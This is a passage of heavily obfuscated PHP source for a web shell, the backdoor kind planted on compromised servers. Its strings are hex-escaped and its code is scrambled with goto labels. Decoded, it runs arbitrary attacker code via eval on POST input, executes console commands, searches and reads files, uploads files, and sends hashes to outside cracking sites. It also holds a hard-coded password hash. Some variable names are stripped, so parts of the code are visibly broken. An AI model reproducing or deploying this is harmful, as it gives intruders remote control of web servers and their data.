strlen($p); ++$i) { $r .= sprintf("\x25\x30\62\x58", ord($p[$i])); } return strtoupper($r); } } if (!function_exists("\146\x75\154\154\137\165\162\154\x65\x6e\x63\157\144\x65")) { function full_urlencode($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= "\x25" . dechex(ord($p[$i])); } return strtoupper($r); } } $stringTools = array("\x42\141\x73\145\x36\x34\40\x65\x6e\143\157\144\x65" => "\x62\x61\163\145\x36\x34\137\x65\156\x63\x6f\144\145", "\x42\141\x73\x65\x36\x34\40\144\145\143\x6f\144\145" => "\x62\141\163\145\66\x34\137\144\145\x63\157\144\x65", "\125\162\154\40\145\x6e\143\157\144\145" => "\165\x72\x6c\145\156\143\157\144\x65", "\x55\162\x6c\x20\144\x65\143\x6f\x64\145" => "\x75\162\154\x64\x65\x63\x6f\x64\x65", "\x46\x75\154\154\40\165\162\x6c\145\x6e\143\157\x64\x65" => "\x66\x75\154\x6c\137\x75\162\x6c\x65\156\143\x6f\x64\145", "\155\144\65\x20\150\x61\x73\x68" => "\155\x64\65", "\163\150\x61\x31\x20\150\x61\x73\150" => "\x73\x68\x61\x31", "\x63\162\171\160\164" => "\x63\162\171\160\x74", "\x43\x52\x43\63\x32" => "\x63\162\x63\x33\62", "\x41\x53\103\111\x49\x20\164\157\x20\110\105\130" => "\141\163\x63\151\151\x32\150\145\x78", "\110\105\x58\x20\164\157\x20\x41\123\103\x49\111" => "\150\x65\x78\62\x61\x73\x63\x69\151", "\x48\105\130\40\164\x6f\40\x44\105\x43" => "\x68\145\170\144\145\x63", "\x48\x45\x58\40\x74\x6f\x20\x42\111\x4e" => "\x68\145\170\62\x62\x69\156", "\104\x45\103\40\164\157\x20\x48\105\x58" => "\x64\145\143\x68\145\170", "\104\105\103\x20\x74\x6f\40\x42\111\x4e" => "\144\x65\143\142\x69\156", "\102\111\x4e\x20\164\157\40\x48\x45\130" => "\142\151\x6e\150\x65\x78", "\102\x49\116\x20\164\157\x20\x44\105\x43" => "\x62\x69\156\x64\145\x63", "\123\x74\162\151\156\x67\40\x74\157\40\154\x6f\167\x65\x72\40\143\141\163\145" => "\x73\164\x72\x74\157\x6c\157\x77\145\162", "\123\x74\x72\x69\x6e\147\40\164\157\40\165\x70\160\x65\x72\40\x63\141\x73\x65" => "\x73\x74\162\x74\157\x75\160\160\x65\162", "\110\x74\x6d\x6c\163\160\145\143\151\141\154\143\150\141\162\x73" => "\x68\x74\155\154\x73\160\145\143\x69\x61\x6c\143\150\x61\162\163", "\123\x74\162\151\x6e\147\x20\x6c\145\156\147\x74\150" => "\x73\164\162\154\x65\x6e"); if (isset($_POST["\x61\x6a\x61\170"])) { prototype(md5($_SERVER["\x48\124\x54\x50\x5f\110\x4f\x53\x54"]) . "\141\x6a\141\170", true); ob_start(); if (in_array($_POST["\x70\61"], $stringTools)) { echo $_POST["\160\61"]($_POST["\x70\62"]); } $temp = "\144\157\143\165\155\145\x6e\x74\x2e\x67\145\164\x45\x6c\x65\x6d\145\156\x74\x42\171\111\144\50\x27\163\x74\x72\x4f\x75\x74\160\x75\164\x27\51\56\163\x74\171\x6c\x65\x2e\144\151\x73\160\x6c\141\171\75\47\x27\x3b\x64\x6f\143\x75\x6d\x65\156\x74\x2e\147\145\164\105\154\145\155\145\156\x74\102\x79\x49\144\x28\47\163\164\162\117\165\x74\x70\x75\164\47\51\x2e\151\x6e\x6e\x65\162\110\x54\x4d\114\x3d\47" . addcslashes(htmlspecialchars(ob_get_clean()), "\12\xd\11\x5c\x27\x0") . "\47\x3b\12"; echo strlen($temp), "\12", $temp; die; } if (empty($_POST["\x61\x6a\x61\170"]) && !empty($_POST["\160\61"])) { prototype(md5($_SERVER["\x48\x54\124\120\x5f\x48\x4f\123\x54"]) . "\x61\152\x61\170", 0); } hardHeader(); echo "\74\150\61\x3e\x53\164\162\x69\x6e\x67\40\143\x6f\x6e\166\x65\x72\x73\x69\x6f\156\163\x3c\57\x68\x31\76\74\144\x69\x76\x20\x63\x6c\x61\x73\x73\75\x63\157\x6e\x74\x65\x6e\164\76"; echo "\74\146\157\x72\x6d\x20\x6e\x61\155\145\75\x27\164\x6f\x6f\154\163\x46\157\x72\155\47\40\x6f\x6e\x53\x75\142\155\x69\164\75\x27\x69\146\50\x74\x68\151\x73\x2e\x61\152\141\170\56\x63\x68\145\x63\x6b\x65\x64\51\x7b\141\50\x6e\x75\154\154\54\x6e\x75\154\154\54\x74\150\151\163\56\x73\145\x6c\145\143\164\x54\157\x6f\154\56\x76\141\x6c\x75\x65\x2c\164\150\x69\163\x2e\x69\x6e\x70\x75\x74\56\x76\x61\154\x75\x65\x29\73\x7d\x65\x6c\x73\x65\x7b\x67\50\x6e\165\x6c\x6c\54\x6e\x75\154\154\54\164\x68\151\x73\56\163\x65\x6c\x65\143\x74\124\157\157\154\56\x76\x61\154\165\145\54\164\x68\151\x73\56\x69\156\x70\x75\164\56\166\141\x6c\165\x65\x29\x3b\175\40\x72\145\x74\x75\x72\x6e\x20\146\x61\154\163\x65\x3b\x27\x3e\x3c\x6c\141\142\x65\154\76\74\163\145\154\145\143\x74\40\156\141\x6d\x65\75\x27\163\x65\x6c\145\143\x74\124\x6f\x6f\x6c\47\76"; foreach ($stringTools as $k => $v) { echo "\74\x6f\x70\164\x69\x6f\156\x20\166\141\x6c\x75\145\x3d\47" . htmlspecialchars($v) . "\47\x3e" . $k . "\x3c\57\x6f\x70\164\x69\157\x6e\76"; } echo "\x3c\57\x73\x65\154\x65\143\164\76\74\57\x6c\141\142\145\154\x3e\74\151\x6e\160\165\164\x20\164\171\x70\145\x3d\47\163\x75\142\155\151\x74\x27\x20\166\x61\x6c\x75\145\75\x27\163\165\142\155\151\164\47\57\x3e\40\x3c\x69\x6e\160\x75\x74\x20\x74\171\x70\145\x3d\143\150\x65\x63\153\x62\x6f\170\40\x6e\141\155\x65\x3d\141\152\141\x78\x20\x76\x61\154\165\x65\75\x31\x20" . (@$_COOKIE[md5($_SERVER["\x48\124\x54\120\x5f\x48\x4f\x53\x54"]) . "\x61\x6a\x61\170"] ? "\143\150\x65\143\153\x65\144" : '') . "\76\40\163\x65\156\x64\40\x75\163\151\156\x67\x20\101\112\x41\x58\74\142\x72\x3e\x3c\x74\x65\170\164\141\162\145\x61\x20\156\141\x6d\145\x3d\47\151\156\x70\165\x74\x27\x20\163\164\x79\x6c\x65\75\x27\x6d\x61\x72\147\151\x6e\x2d\164\x6f\x70\x3a\x35\x70\x78\47\40\143\154\141\x73\x73\x3d\x62\151\147\x61\162\145\141\76" . (empty($_POST["\x70\61"]) ? '' : htmlspecialchars(@$_POST["\160\x32"])) . "\x3c\x2f\164\x65\x78\164\x61\162\145\141\x3e\74\57\146\x6f\x72\155\x3e\x3c\x70\162\145\x20\x63\x6c\x61\x73\x73\x3d\47\x6d\154\61\47\x20\163\x74\171\x6c\x65\75\47" . (empty($_POST["\x70\x31"]) ? "\144\151\163\x70\154\x61\171\72\156\x6f\156\x65\x3b" : '') . "\155\x61\x72\x67\151\x6e\x2d\x74\157\x70\x3a\65\160\170\47\40\151\x64\75\x27\x73\164\162\117\x75\164\x70\165\x74\x27\x3e"; if (!empty($_POST["\x70\61"])) { if (in_array($_POST["\160\61"], $stringTools)) { echo htmlspecialchars($_POST["\160\x31"]($_POST["\x70\62"])); } } echo "\74\57\160\162\145\x3e\x3c\x2f\x64\x69\166\76\x3c\x62\162\x3e\74\x68\61\x3e\x53\145\141\x72\x63\x68\40\146\151\154\x65\163\72\x3c\57\150\61\76\x3c\x64\x69\166\40\143\x6c\x61\163\163\x3d\x63\157\156\x74\x65\156\x74\x3e\12\11\11\74\146\x6f\162\x6d\40\157\156\x73\165\142\x6d\x69\x74\x3d\42\x67\50\156\x75\x6c\x6c\x2c\x74\150\x69\x73\x2e\143\167\144\x2e\x76\x61\x6c\165\145\54\x6e\x75\x6c\154\54\164\150\151\x73\56\x74\x65\x78\164\x2e\x76\141\x6c\x75\x65\54\x74\x68\151\x73\x2e\146\x69\154\x65\156\x61\x6d\x65\56\166\x61\x6c\x75\145\x29\x3b\162\145\164\165\x72\x6e\x20\146\x61\154\x73\145\x3b\42\76\74\x74\x61\x62\x6c\145\x20\143\145\x6c\154\160\x61\x64\144\x69\x6e\147\75\x27\x31\47\x20\x63\x65\154\154\163\160\141\143\151\156\147\75\x27\60\47\x20\167\x69\144\164\x68\75\x27\x35\x30\x25\x27\x3e\xa\x9\x9\11\74\x74\x72\x3e\x3c\x74\144\x20\167\151\144\164\150\75\x27\x31\x25\x27\76\x54\x65\x78\164\x3a\74\x2f\x74\x64\x3e\x3c\164\x64\x3e\x3c\x69\156\x70\165\164\x20\x74\x79\x70\145\75\x27\x74\x65\x78\x74\47\40\156\x61\x6d\145\75\47\x74\x65\170\x74\47\40\x73\164\x79\154\145\75\x27\x77\151\x64\x74\x68\72\61\x30\60\45\47\x3e\74\57\164\144\x3e\x3c\57\x74\x72\76\xa\11\x9\11\x3c\164\x72\x3e\x3c\x74\144\76\120\x61\164\150\x3a\x3c\x2f\164\x64\x3e\x3c\x74\144\76\74\151\156\160\x75\x74\x20\164\x79\160\x65\75\x27\x74\x65\170\164\47\x20\x6e\x61\155\145\75\x27\x63\x77\x64\x27\40\x76\141\154\x75\145\75\x27" . htmlspecialchars($GLOBALS["\x63\167\144"]) . "\x27\x20\163\164\x79\154\145\75\47\167\x69\x64\164\150\x3a\61\x30\x30\x25\47\x3e\x3c\x2f\164\x64\76\74\57\x74\x72\x3e\12\11\x9\11\x3c\x74\x72\76\x3c\x74\x64\76\x4e\141\x6d\145\72\74\57\x74\x64\76\x3c\x74\144\x3e\74\x69\156\x70\165\164\x20\x74\171\160\x65\75\47\164\x65\170\x74\47\40\156\x61\155\x65\x3d\47\146\x69\154\x65\156\141\155\145\x27\40\x76\x61\x6c\x75\145\x3d\x27\52\x27\40\163\164\x79\x6c\x65\75\47\167\x69\x64\x74\150\72\61\x30\x30\45\47\76\x3c\x2f\164\144\76\74\x2f\164\162\76\xa\x9\x9\x9\74\x74\162\x3e\74\x74\144\x3e\x3c\57\164\144\76\x3c\164\x64\x3e\74\151\156\160\165\164\x20\164\171\x70\145\75\x27\163\x75\x62\155\x69\x74\x27\x20\x76\141\x6c\x75\x65\x3d\47\163\x75\x62\155\151\164\47\76\x3c\x2f\164\144\x3e\74\x2f\x74\x72\76\xa\11\x9\11\x3c\x2f\x74\141\x62\154\x65\x3e\74\57\x66\x6f\x72\155\x3e"; function hardRecursiveGlob($path) { if (substr($path, -1) != "\57") { $path .= "\x2f"; } $paths = @array_unique(@array_merge(@glob($path . $_POST["\x70\x33"]), @glob($path . "\52", GLOB_ONLYDIR))); if (is_array($paths) && @count($paths)) { foreach ($paths as $) { if (@is_dir($)) { if ($path != $) { hardRecursiveGlob($); } } else { if (empty($_POST["\x70\x32"]) || @strpos(file_get_contents($), $_POST["\160\x32"]) !== false) { echo "\74\141\40\150\x72\145\146\x3d\47\43\x27\x20\157\x6e\143\154\x69\143\153\x3d\x27\147\50\x22\x46\151\x6c\x65\163\124\157\157\154\163\x22\54\156\165\154\x6c\54\42" . urlencode($) . "\x22\x2c\40\x22\x76\x69\x65\167\x22\x2c\x22\x22\51\x27\x3e" . htmlspecialchars($) . "\74\57\141\76\x3c\142\162\76"; } } } } } if (@$_POST["\160\x33"]) { hardRecursiveGlob($_POST["\143"]); } echo "\74\57\144\x69\x76\x3e\74\142\162\x3e\74\x68\61\x3e\123\145\x61\162\143\150\40\146\x6f\162\x20\x68\x61\x73\150\72\74\57\x68\x31\76\74\x64\x69\166\x20\143\x6c\x61\x73\x73\x3d\x63\157\156\x74\x65\156\164\x3e\12\x9\x9\x3c\x66\x6f\162\x6d\40\155\145\164\150\x6f\144\75\x27\x70\157\163\164\x27\x20\x74\x61\x72\147\x65\164\75\47\x5f\x62\154\x61\x6e\x6b\47\x20\156\x61\x6d\145\x3d\x27\150\146\47\x3e\12\x9\11\x9\74\151\156\160\x75\x74\40\164\x79\160\145\x3d\47\x74\x65\170\x74\x27\40\156\141\155\x65\75\47\150\x61\x73\150\x27\40\x73\164\171\154\x65\75\x27\167\x69\x64\x74\x68\x3a\x33\63\60\x70\170\73\x27\x3e\x3c\142\x72\76\xa\x20\40\x20\40\x20\40\40\x20\40\x20\40\40\x3c\x69\156\x70\x75\x74\x20\164\x79\x70\145\x3d\x27\150\151\144\144\x65\156\x27\x20\x6e\x61\155\x65\x3d\x27\x61\143\164\47\40\166\141\154\x75\145\75\47\146\151\156\144\47\57\x3e\74\142\x72\x3e\xa\11\11\x9\x3c\151\x6e\x70\x75\164\x20\164\x79\160\145\75\x27\x73\x75\142\x6d\151\164\x27\x20\x76\141\154\x75\145\x3d\47\x6d\144\x35\x2e\162\x65\x64\156\x6f\x69\172\145\x2e\143\x6f\x6d\47\x20\x6f\156\x63\154\x69\x63\153\x3d\x22\144\157\x63\165\x6d\x65\x6e\x74\x2e\x68\x66\56\x61\x63\164\x69\157\x6e\x3d\x27\150\x74\164\x70\x3a\x2f\57\x6d\144\x35\x2e\162\x65\144\x6e\157\151\x7a\145\56\x63\157\x6d\57\x3f\x71\75\x27\53\x64\x6f\143\x75\x6d\145\156\x74\x2e\x68\146\56\150\141\x73\x68\56\166\141\x6c\x75\145\53\47\x26\163\75\155\144\65\x27\x3b\144\157\x63\x75\x6d\145\x6e\x74\56\150\x66\56\x73\165\x62\x6d\151\164\x28\51\42\x3e\12\x9\11\x9\74\x69\x6e\160\165\164\40\x73\x74\x79\x6c\145\x3d\x27\x6d\141\x72\147\151\156\x2d\x6c\x65\x66\x74\x3a\x20\x32\x30\x70\170\73\x27\40\x74\x79\160\x65\75\x27\x73\x75\142\155\x69\x74\47\40\x76\x61\x6c\x75\145\75\47\155\144\x35\x64\145\143\162\x79\160\164\145\x72\x2e\x63\157\x6d\47\40\x6f\156\x63\x6c\151\143\x6b\x3d\x22\144\x6f\x63\165\x6d\145\156\x74\56\x68\146\56\x61\x63\x74\151\157\x6e\75\x27\x68\x74\x74\160\x73\x3a\57\57\x77\x77\x77\x2e\x6d\144\65\x64\145\143\162\171\160\x74\145\162\56\143\x6f\155\57\47\x3b\x64\x6f\143\x75\155\145\156\164\56\x68\x66\x2e\163\x75\142\x6d\x69\164\x28\51\x22\x3e\x3c\142\x72\76\12\x9\11\x3c\x2f\x66\157\162\x6d\x3e\x3c\57\144\x69\x76\76"; hardFooter(); } goto gaKKg; qZ6Xj: if (!function_exists("\x70\157\163\x69\170\137\147\x65\x74\147\x72\x67\151\x64") && strpos($GLOBALS["\x64\151\x73\x61\x62\x6c\145\137\x66\x75\x6e\x63\x74\x69\x6f\156\x73"], "\x70\x6f\x73\151\x78\x5f\147\145\x74\147\x72\147\x69\x64") === false) { function posix_getgrgid($p) { return false; } } goto VMrgb; WeQHr: $ = md5($_SERVER["\x48\124\x54\x50\x5f\125\x53\105\122\137\101\107\105\x4e\x54"]); goto p3F43; r4nyR: $ = "\146\141\67\66\71\144\x61\x63\67\141\x30\x61\71\x34\145\x65\64\67\144\70\x65\142\x65\60\x32\x31\x65\141\x62\141\x39\x65"; goto u_TFV; xWgYK: function actionPhp() { if (isset($_POST["\141\152\x61\170"])) { $_COOKIE[md5($_SERVER["\110\x54\124\x50\137\110\x4f\123\124"]) . "\x61\152\x61\x78"] = true; ob_start(); eval($_POST["\x70\61"]); $temp = "\144\157\143\x75\155\x65\156\x74\x2e\147\145\x74\x45\x6c\x65\155\x65\156\x74\102\171\x49\144\50\47\120\150\x70\x4f\165\164\x70\165\x74\47\x29\x2e\x73\x74\x79\154\x65\x2e\x64\151\163\160\x6c\141\171\75\x27\x27\x3b\x64\157\143\165\x6d\x65\156\x74\56\147\145\x74\x45\154\x65\155\145\x6e\x74\102\171\111\x64\50\47\120\150\x70\x4f\x75\x74\160\x75\164\x27\51\x2e\151\x6e\x6e\x65\162\110\124\x4d\114\75\47" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa\xd\11\x5c\x27\x0") . "\47\73\xa"; echo strlen($temp), "\xa", $temp; die; } hardHeader(); if (isset($_POST["\160\62"]) && $_POST["\x70\62"] == "\151\x6e\146\x6f") { echo "\x3c\x68\61\x3e\x50\x48\x50\40\x69\x6e\146\157\74\x2f\150\61\76\x3c\144\151\x76\40\x63\154\x61\x73\163\75\x63\x6f\156\164\145\156\x74\76"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace("\x21\142\x6f\144\x79\40\173\x2e\x2a\x7d\x21\155\x73\151\x55", '', $tmp); $tmp = preg_replace("\41\x61\72\134\167\53\40\x7b\x2e\x2a\x7d\x21\155\163\x69\x55", '', $tmp); $tmp = preg_replace("\41\150\x31\41\155\x73\151\125", "\x68\62", $tmp); $tmp = preg_replace("\x21\x74\x64\x2c\x20\x74\x68\x20\x7b\50\x2e\x2a\x29\x7d\x21\155\x73\151\x55", "\56\145\x2c\x20\x2e\166\x2c\x20\56\x68\x2c\x20\56\x68\x20\x74\150\40\173\x24\x31\x7d", $tmp); $tmp = preg_replace("\41\142\157\144\171\x2c\x20\164\144\54\x20\164\150\x2c\40\150\x32\x2c\x20\x68\62\40\x7b\56\x2a\x7d\x21\155\x73\x69\x55", '', $tmp); echo $tmp; echo "\74\57\x64\151\166\x3e\x3c\142\x72\x3e"; } if (empty($_POST["\x61\x6a\141\x78"]) && !empty($_POST["\x70\x31"])) { $_COOKIE[md5($_SERVER["\x48\x54\124\x50\137\110\x4f\123\x54"]) . "\x61\152\141\170"] = false; } echo "\74\150\x31\76\x45\x78\x65\x63\x75\164\x69\157\156\x20\120\x48\x50\55\143\157\x64\145\74\x2f\150\x31\x3e\x3c\144\x69\166\x20\x63\x6c\141\163\x73\x3d\143\157\x6e\164\145\156\164\x3e\74\146\x6f\162\x6d\40\x6e\141\155\x65\75\x70\146\x20\155\x65\164\150\x6f\144\x3d\160\x6f\x73\164\40\157\x6e\x73\165\142\155\x69\164\75\42\x69\x66\x28\164\x68\151\x73\x2e\x61\x6a\141\170\56\x63\x68\x65\143\x6b\145\x64\51\x7b\141\x28\x6e\x75\x6c\154\x2c\156\165\154\x6c\54\x74\150\151\163\x2e\x63\x6f\x64\x65\56\166\x61\x6c\165\x65\x29\x3b\175\x65\x6c\163\x65\x7b\x67\50\156\x75\x6c\x6c\x2c\x6e\165\x6c\154\54\x74\150\151\x73\x2e\143\x6f\144\x65\x2e\x76\141\x6c\x75\145\x2c\x27\47\x29\x3b\x7d\x72\145\x74\165\x72\156\x20\146\141\154\x73\145\73\x22\x3e\74\x74\x65\170\x74\x61\x72\145\x61\x20\x6e\x61\x6d\145\75\x63\x6f\x64\145\40\143\x6c\141\163\163\75\142\151\147\141\x72\145\x61\x20\151\x64\75\x50\x68\160\x43\x6f\x64\x65\76" . (!empty($_POST["\x70\x31"]) ? htmlspecialchars($_POST["\160\61"]) : '') . "\x3c\x2f\164\x65\x78\164\141\162\x65\x61\x3e\x3c\151\156\x70\x75\x74\x20\164\171\160\145\x3d\x73\x75\142\155\151\x74\40\x76\141\x6c\x75\x65\x3d\105\x76\x61\154\40\x73\x74\171\x6c\x65\x3d\42\x6d\x61\162\147\151\x6e\x2d\x74\x6f\x70\x3a\x35\160\x78\42\x3e"; echo "\40\74\151\156\160\165\x74\x20\164\x79\x70\145\x3d\x63\150\x65\143\x6b\x62\157\170\40\x6e\141\x6d\145\75\x61\152\141\170\x20\166\141\154\x75\145\75\x31\40" . ($_COOKIE[md5($_SERVER["\x48\124\124\x50\x5f\x48\117\123\x54"]) . "\x61\152\141\170"] ? "\143\150\145\143\x6b\x65\x64" : '') . "\x3e\x20\163\x65\156\144\x20\165\x73\151\x6e\x67\x20\x41\x4a\101\x58\74\57\146\x6f\x72\x6d\76\x3c\160\162\x65\40\x69\144\75\x50\150\x70\x4f\x75\x74\x70\165\164\x20\x73\x74\x79\154\145\x3d\x22" . (empty($_POST["\x70\x31"]) ? "\144\151\163\x70\x6c\x61\x79\x3a\x6e\157\156\145\73" : '') . "\155\x61\162\x67\x69\x6e\x2d\x74\x6f\x70\72\65\160\x78\73\42\x20\x63\154\141\163\x73\75\155\154\x31\x3e"; if (!empty($_POST["\x70\61"])) { ob_start(); eval($_POST["\160\x31"]); echo htmlspecialchars(ob_get_clean()); } echo "\74\x2f\x70\162\145\76\x3c\x2f\x64\x69\x76\76"; hardFooter(); } goto bY27C; Th0Rk: function actionRC() { if (!@$_POST["\x70\61"]) { $a = array("\x75\x6e\x61\x6d\x65" => php_uname(), "\x70\x68\x70\137\x76\x65\162\163\151\x6f\156" => phpversion(), "\x56\105\122\x53\x49\117\116" => VERSION, "\x73\x61\x66\x65\155\x6f\x64\145" => @ini_get("\x73\141\x66\x65\x5f\155\x6f\x64\x65")); echo serialize($a); } else { eval($_POST["\160\61"]); } } goto w9TDR; OWR26: function hardFooter() { $is_writable = is_writable($GLOBALS["\x63\x77\x64"]) ? "\40\74\146\157\x6e\164\40\143\x6f\x6c\157\x72\75\x27\x23\146\71\143\64\x34\x30\47\76\133\x20\x57\x72\151\x74\145\x61\142\154\x65\40\135\74\x2f\146\x6f\x6e\x74\76" : "\40\74\146\x6f\156\x74\x20\143\157\x6c\157\162\x3d\43\x61\x31\60\x37\x30\x35\x3e\50\x4e\157\164\40\x77\x72\x69\x74\141\x62\154\x65\x29\x3c\57\x66\x6f\156\x74\x3e"; echo "\12\x3c\x2f\144\151\x76\76\12\74\x74\141\142\x6c\145\40\x63\154\x61\163\163\x3d\151\x6e\x66\157\40\x69\x64\75\164\x6f\157\154\163\124\x62\x6c\40\x63\145\x6c\154\160\x61\144\x64\151\x6e\147\75\63\40\143\x65\x6c\154\x73\160\141\143\x69\x6e\x67\75\60\40\x77\151\144\x74\x68\75\61\60\x30\45\76\12\x9\x3c\x74\x72\76\xa\11\11\74\164\144\76\74\146\x6f\x72\155\40\157\156\x73\x75\x62\x6d\151\164\75\42" . (function_exists("\141\143\164\x69\x6f\156\106\x69\154\145\x73\115\x61\156") ? "\x67\x28\x6e\x75\154\154\54\x74\150\x69\x73\x2e\x63\56\x76\x61\154\165\145\x2c\x27\x27\51\73" : '') . "\x72\145\164\165\x72\156\x20\146\x61\x6c\163\x65\73\x22\76\74\x73\x70\x61\156\x3e\103\x68\141\x6e\147\x65\40\144\151\x72\72\x3c\57\x73\x70\141\x6e\76\74\x62\162\x3e\x3c\x69\156\160\x75\x74\40\x63\x6c\x61\x73\x73\75\x27\x74\157\x6f\x6c\163\x49\x6e\160\x27\x20\164\x79\x70\x65\x3d\164\145\x78\164\x20\x6e\141\x6d\145\x3d\x63\40\x76\141\154\x75\145\75\x27" . htmlspecialchars($GLOBALS["\143\167\144"]) . "\x27\76\x3c\x69\x6e\x70\x75\164\40\x74\x79\x70\x65\75\163\x75\142\155\151\164\40\166\x61\154\165\x65\x3d\x27\x73\x75\x62\x6d\151\x74\x27\76\74\57\146\157\162\155\76\74\57\x74\x64\x3e\xa\11\11\x3c\164\x64\76\74\x66\157\162\x6d\40\157\156\x73\165\142\155\x69\x74\x3d\x22" . (function_exists("\x61\x63\164\151\x6f\x6e\106\x69\x6c\145\x73\124\x6f\157\x6c\163") ? "\147\x28\x27\106\151\154\145\163\x54\x6f\157\x6c\x73\x27\54\156\165\x6c\x6c\x2c\x74\150\x69\163\x2e\x66\56\166\x61\154\165\x65\51\73" : '') . "\x72\x65\x74\x75\162\156\40\146\141\x6c\x73\x65\x3b\42\76\74\x73\160\x61\156\x3e\122\145\x61\144\40\x66\151\x6c\x65\72\x3c\57\163\160\141\x6e\76\74\142\x72\76\74\x69\156\x70\165\164\x20\x63\154\141\163\163\75\47\x74\157\x6f\x6c\163\x49\x6e\160\x27\40\x74\x79\160\145\x3d\164\145\170\x74\x20\x6e\141\x6d\145\75\146\40\162\145\x71\x75\x69\162\145\x64\76\74\151\156\160\x75\164\x20\164\171\160\145\75\163\165\x62\155\x69\164\x20\x76\141\154\165\x65\x3d\47\x73\165\142\155\x69\x74\47\76\x3c\x2f\x66\x6f\162\x6d\76\x3c\x2f\164\144\x3e\12\x9\74\57\164\x72\x3e\74\x74\x72\76\xa\x9\x9\74\164\144\76\x3c\x66\x6f\x72\x6d\40\157\156\x73\x75\142\155\x69\164\75\42" . (function_exists("\x61\x63\164\x69\157\x6e\106\151\x6c\x65\163\x4d\141\156") ? "\x67\x28\x27\x46\x69\154\145\x73\115\x61\x6e\47\x2c\156\165\x6c\x6c\54\x27\155\x6b\x64\151\162\47\x2c\164\x68\151\x73\x2e\144\56\166\x61\154\x75\145\51\x3b" : '') . "\x72\145\164\165\162\156\x20\x66\x61\154\x73\145\x3b\x22\76\x3c\163\160\x61\x6e\76\115\x61\153\145\40\144\x69\x72\72\x3c\x2f\x73\160\x61\x6e\76{$is_writable}\x3c\x62\x72\76\x3c\151\x6e\160\x75\164\40\143\154\x61\163\x73\75\x27\x74\x6f\x6f\x6c\x73\111\x6e\x70\47\x20\164\x79\x70\x65\75\164\145\x78\164\x20\x6e\141\155\145\75\144\x20\x72\145\161\165\151\x72\145\x64\76\x3c\151\x6e\x70\x75\164\x20\164\171\160\x65\75\163\165\142\x6d\151\164\40\166\x61\x6c\x75\x65\x3d\47\x73\165\142\x6d\151\164\47\x3e\x3c\57\x66\157\162\x6d\x3e\74\x2f\x74\144\76\12\x9\11\74\x74\144\76\x3c\x66\157\x72\155\40\157\x6e\163\x75\x62\155\151\164\75\x22" . (function_exists("\x61\143\x74\x69\x6f\x6e\x46\x69\x6c\145\163\124\157\x6f\154\x73") ? "\x67\x28\x27\106\x69\154\145\x73\124\157\157\154\x73\47\x2c\156\x75\154\154\x2c\164\x68\151\163\56\146\x2e\x76\x61\154\x75\145\x2c\x27\x6d\153\146\x69\x6c\x65\47\51\x3b" : '') . "\x72\x65\164\165\162\x6e\x20\146\x61\x6c\x73\x65\x3b\42\76\x3c\x73\160\141\156\x3e\115\x61\153\x65\40\146\x69\x6c\x65\72\74\x2f\163\160\141\156\76{$is_writable}\x3c\142\162\x3e\74\x69\156\x70\x75\x74\40\143\154\141\163\x73\x3d\47\164\x6f\x6f\x6c\163\x49\x6e\x70\x27\x20\x74\x79\160\x65\x3d\x74\x65\170\164\x20\156\141\155\x65\75\146\40\x72\x65\x71\165\x69\x72\145\x64\76\74\151\x6e\x70\x75\164\40\x74\x79\160\145\75\163\165\142\x6d\x69\164\40\166\x61\x6c\x75\x65\75\47\163\165\142\x6d\151\x74\x27\x3e\x3c\x2f\x66\157\162\x6d\x3e\74\x2f\164\144\x3e\12\11\74\x2f\164\162\x3e\74\164\x72\76\xa\x9\11\x3c\164\x64\76\74\146\157\x72\155\x20\157\156\163\x75\142\x6d\151\x74\x3d\x22" . (function_exists("\141\x63\x74\x69\x6f\x6e\x43\x6f\x6e\x73\x6f\x6c\145") ? "\147\50\47\x43\x6f\x6e\163\157\154\x65\x27\54\x6e\165\154\154\54\164\150\x69\163\x2e\143\x2e\166\141\x6c\165\145\x29\73" : '') . "\x72\145\x74\165\x72\x6e\x20\146\141\x6c\163\x65\73\x22\76\74\163\160\141\x6e\x3e\x45\170\x65\x63\x75\x74\x65\72\x3c\57\163\160\x61\156\76\74\x62\162\76\74\151\156\160\x75\164\40\143\154\x61\x73\163\x3d\x27\164\x6f\157\154\163\111\156\160\47\40\x74\x79\160\145\x3d\164\x65\x78\x74\x20\156\141\x6d\x65\x3d\x63\x20\x76\x61\x6c\165\145\75\x27\47\x3e\74\x69\x6e\x70\x75\x74\x20\164\171\160\145\75\x73\x75\x62\155\x69\164\40\166\141\154\165\145\75\47\x73\165\x62\155\151\x74\47\x3e\x3c\x2f\146\x6f\x72\155\x3e\x3c\x2f\x74\x64\76\12\11\11\74\164\144\x3e\74\146\157\162\x6d\x20\155\145\164\x68\157\x64\75\x27\160\157\x73\x74\x27\x20" . (!function_exists("\141\x63\164\x69\x6f\x6e\106\x69\x6c\145\163\x4d\141\156") ? "\x20\157\x6e\x73\x75\x62\155\x69\x74\75\x22\162\145\164\x75\x72\156\40\x66\x61\154\x73\x65\x3b\x22\x20" : '') . "\x45\116\103\124\x59\120\x45\x3d\x27\155\165\154\x74\151\x70\141\162\164\x2f\x66\x6f\162\155\x2d\144\141\x74\141\47\x3e\12\x9\11\x3c\x69\x6e\x70\x75\164\x20\164\x79\x70\145\x3d\150\151\144\x64\x65\x6e\40\156\141\x6d\145\x3d\141\x20\x76\141\x6c\x75\x65\x3d\x27\106\x69\x6c\x65\163\x4d\x61\156\47\76\xa\11\11\74\151\x6e\x70\x75\x74\x20\164\171\160\x65\x3d\150\151\144\x64\145\x6e\x20\156\141\155\x65\75\x63\40\x76\141\x6c\x75\145\75\x27" . htmlspecialchars($GLOBALS["\143\x77\144"]) . "\x27\x3e\xa\11\11\74\151\156\x70\165\164\40\164\x79\x70\x65\x3d\x68\x69\x64\144\145\x6e\40\x6e\141\x6d\145\x3d\x70\x31\40\x76\141\154\x75\145\75\x27\165\160\154\157\x61\x64\x46\x69\x6c\x65\x27\x3e\12\x9\11\74\151\156\x70\165\x74\x20\164\x79\160\x65\x3d\x68\151\x64\x64\145\x6e\40\156\141\155\145\x3d\x6e\145\40\x76\x61\154\165\145\75\x27\47\x3e\12\x9\x9\x3c\151\x6e\x70\x75\164\x20\164\x79\x70\145\x3d\150\151\144\144\x65\x6e\40\156\x61\155\x65\x3d\x63\x68\141\162\163\145\x74\40\166\141\154\x75\x65\75\x27" . (isset($_POST["\143\150\141\x72\x73\145\x74"]) ? $_POST["\x63\150\141\x72\163\x65\164"] : '') . 